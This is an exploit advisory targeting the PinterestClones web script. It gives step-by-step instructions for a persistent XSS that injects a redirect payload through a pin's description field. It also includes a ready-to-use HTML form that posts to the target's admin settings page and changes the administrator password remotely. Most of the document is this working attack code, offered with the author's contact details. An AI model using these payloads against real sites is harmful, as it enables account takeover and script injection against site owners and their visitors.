##########################################[~] Exploit Title: Pinterestclones Multiple Vulnerabilities
[~] Author: DaOne
[~] Price: $199.99[~] Software Link: http://www.pinterestclones.com/[~] Google Dork: N/A
##########################################[#] [Persistent XSS]
How to exploit:1-go to : http://site.com/createusernamen/2-Put anything in the other field [Password & E-mail] etc...3-Go to: Add > Upload a Pin and Put in[Description] field the XSS code >Example:<META http-equiv="refresh" content="0;URL=http://www.google.com">4-Now anyone go to: http://site.com/ will redirected to google.com or exploit your XSS Code.[#] [Remote Change Admin Password]<form action="http://[TARGET]/admin/settings.php" method="post"class="niceform" name="frmname" enctype="multipart/form-data">
Name:<inputtype="text"class="txtFname" name="name"id="name" size="50" value="Admin"/>
User Name:<inputtype="text"class="txtFname" name="uname" readonly="readonly"id="uname" size="50" value="admin@pinterestclones.com"/>
New Password:<inputtype="password"class="txtFname" name="password"id="password" size="50" value=""/>
Confirm Password:<inputtype="password"class="txtFname" name="cpassword"id="cpassword" size="50" value=""/>
Site Slogan:<inputtype="text" name="txtSlogan"id="txtSlogan" size="50" value="Your online pinboard"/>
Site URL:<inputtype="text" name="txtUrl"id="txtUrl" size="50" value=""/>
Admin Email:<inputtype="text" name="aemail"id="aemail" size="50" value=""/>
�Under maintenance:<select name="maintenance"><option value="No" selected>No</option><option value="Yes">Yes</option></select>
Maintenance message:<inputtype="text" name="maintenancemsg"id="maintenancemsg" size="50" value="We are upgrading the site."/><dl class="submit"><inputtype="submit" value="Save"class="submit" name="sbmtbtn" style="width:50px;"/></form>##########################################[*] Contact me
�www.facebook.com/TGT.LY
##########################################
